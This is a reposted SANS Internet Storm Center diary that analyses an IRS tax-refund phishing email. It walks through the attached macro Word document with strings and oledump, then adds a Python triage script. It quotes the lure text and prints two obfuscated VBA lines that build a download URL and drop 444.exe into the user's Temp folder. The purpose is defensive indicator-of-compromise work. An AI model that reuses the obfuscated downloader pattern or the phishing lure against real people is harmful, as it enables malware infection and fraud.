Fast analysis of a Tax Scam (Fri, Feb 20th)

It's tax time and I'm starting to see a lot of phish/spam about this subject. Below is a popular one from the last couple of days.

TAX RETURN FOR THE YEAR [...]
RECALCULATION OF YOUR R[...]
HR[...]
LOCAL OFFICE [...]
TAX CREDIT OFFICER: Jimmie B[...]
TAX REFUND ID NUMBER [...]
REFUND AMOUNT [...]
D[...]

The contents of this email and any attachments are confidential and [...] applicable, copyright in these is reserved to IRS Revenue [...] Unless expressly authorised by us, any further dissemination or distribution of this mail or its attachments is prohibited.

If you are not the intended recipient of this email, please re[...] inform us that you have received this email in error and then delete it without retaining any [...] I am sending this email to announce: After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund. You have attached the tax return form with the TAX REFUND NUMBER ID: 2440409, complete the tax return form attached to this message.

After completing the form, please submit the form by clicking the SUBMIT button on f[...]

Sincerely,
Jimmie [...]
IRS Tax Credit [...]
TAX REFUND ID: US2440409-IRS

Copyright 2015, IRS Revenue [...] All rights reserved.
======================

With so many of these types of mails, analysis needs to be quick to determine who may have been affected.

$mv

  inflating: [Content_Types].xml
  inflating: _rels/.rels
  inflating: word/_rels/document.xml.rels
  inflating: word/document.xml
  inflating: word/header3.xml
  inflating: word/footer2.xml
  inflating: word/footer1.xml
  inflating: word/header2.xml
  inflating: word/header1.xml
  inflating: word/endnotes.xml
  inflating: word/footnotes.xml
  inflating: word/footer3.xml
  inflating: word/theme/theme1.xml
  inflating: word/_rels/vbaProject.bin.rels
  inflating: word/vbaProject.bin
  inflating: word/settings.xml
  inflating: word/vbaData.xml
  inflating: word/webSettings.xml
  inflating: word/styles.xml
  inflating: docProps/app.xml
  inflating: docProps/core.xml
  inflating: word/fontTable.xml

The vbaProject.bin file holds the macro code we want to look at, so we run strings on it.

$strings word/vbaProject.bin

$someFilePath = 
…

Within about 2 minutes I was able to determine some basic IOCs and see whether anyone had actually accessed the site or tried to ping the address.

If you want to dig deeper and spend a bit more time, you can install and configure oledump, which was discussed on (hxxps://

A1:       556 'PROJECT'
A2:        71 'PROJECTwm'
A3:        97 'UserForm1/\x01CompObj'
A4:       266 'UserForm1/\x03VBFrame'
A5:        58 'UserForm1/f'
A6:         0 'UserForm1/o'
A7: M   25751 'VBA/ThisDocument'
A8: m    1159 'VBA/UserForm1'
A9:      4506 'VBA/_VBA_PROJECT'
A10:      811 'VBA/dir'

$python oledump.py -s A7 -v MALWARE-tax_refund_2440409.doc

' The macro writes a script one line at a time; each string is built from
' literals and Chr()/Asc() wrappers so that "http" and ".exe" never appear whole.
' The host portion of the URL is not shown in the diary.
Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e"
Print #FileNumber, "$someFilePath = c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" + Chr(Asc("x")) + "e"

In this case oledump gave us a lot more info, and it confirms we were on the right track with simple strings on the file. Additionally, we can see that an infected user may have a file called 444.exe. There are many more local IOCs we could create, but with the few network IOCs we can get a fast idea of possibly affected users.
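To automate the fast triage walked through above (treat the document as a ZIP, pull strings from word/vbaProject.bin, and read the Chr()/Asc() obfuscated Print lines that oledump exposed), here is an added Python example; it is not part of the diary and not oledump's code. It works on a constructed stand-in document, so the host name example.invalid, the USER placeholder and the path are assumptions; a real vbaProject.bin stores the VBA source compressed, which is why the diary reaches for oledump -v before the source reads like this.

```python
import io, re, zipfile

STRINGS_RE = re.compile(rb"[\x20-\x7e]{6,}")          # what `strings` prints
CHR_ASC_RE = re.compile(r'Chr\(Asc\("(.)"\)\)')        # Chr(Asc("x")) -> "x"
CHR_NUM_RE = re.compile(r"Chr\((\d+)\)")               # Chr(34) -> "
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w./\-]*)?")
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"']+")

def extract_strings(blob: bytes) -> list:
    """Printable ASCII runs, the equivalent of `strings word/vbaProject.bin`."""
    return [m.group().decode("ascii") for m in STRINGS_RE.finditer(blob)]

def deobfuscate(expr: str) -> str:
    """Evaluate a VBA '+' concatenation of literals and Chr()/Asc() wrappers.
    Assumes no '+' inside string literals, which holds for the dumped macro."""
    n = 1
    while n:  # peel nested Chr(Asc(Chr(Asc("t")))) one layer per pass
        expr, n = CHR_ASC_RE.subn(lambda m: f'"{m.group(1)}"', expr)
    def value(tok: str) -> str:
        m = CHR_NUM_RE.fullmatch(tok)
        if m:                                    # Chr(34) and friends
            return chr(int(m.group(1)))
        if len(tok) > 1 and tok[0] == tok[-1] == '"':
            return tok[1:-1]                     # plain string literal
        return f"<{tok}>"                        # a variable such as USER
    return "".join(value(t.strip()) for t in expr.split("+"))

def triage(doc_bytes: bytes) -> dict:
    """Open the Word file as a ZIP, dump the macro container, return IOCs.
    The macro writes its payload script as: Print #FileNumber, <expr>"""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        if "word/vbaProject.bin" not in z.namelist():
            return {"macro": False, "urls": [], "paths": []}
        vba = z.read("word/vbaProject.bin")
    text = "\n".join(deobfuscate(s.split(",", 1)[1])
                     for s in extract_strings(vba) if s.startswith("Print #"))
    return {"macro": True, "urls": sorted(set(URL_RE.findall(text))),
            "paths": sorted(set(PATH_RE.findall(text)))}

def build_sample_doc() -> bytes:
    """Constructed stand-in for the diary's .doc (host name and user made up). Real
    vbaProject.bin stores source compressed (hence oledump -v); here it is plain."""
    macro = (b'Print #FileNumber, "$strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p"'
             b' + "://" + "example" + "." + Chr(Asc("i")) + "nvalid/" + "444" + "." + Chr(Asc("e"))'
             b' + Chr(Asc("x")) + "e"\r\nPrint #FileNumber, "$someFilePath = " + Chr(34) + "c:\\Users\\"'
             b' + USER + "\\AppData\\Local\\Temp\\" + "444.e" + Chr(Asc("x")) + "e"\r\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/vbaProject.bin", b"\x00" * 16 + macro + b"\x00" * 16)
    return buf.getvalue()
```

Running triage(build_sample_doc()) reports the download URL and the dropped path c:\Users\<USER>\AppData\Local\Temp\444.exe, the two IOC classes the diary ends up with.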

Tom Webb

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS.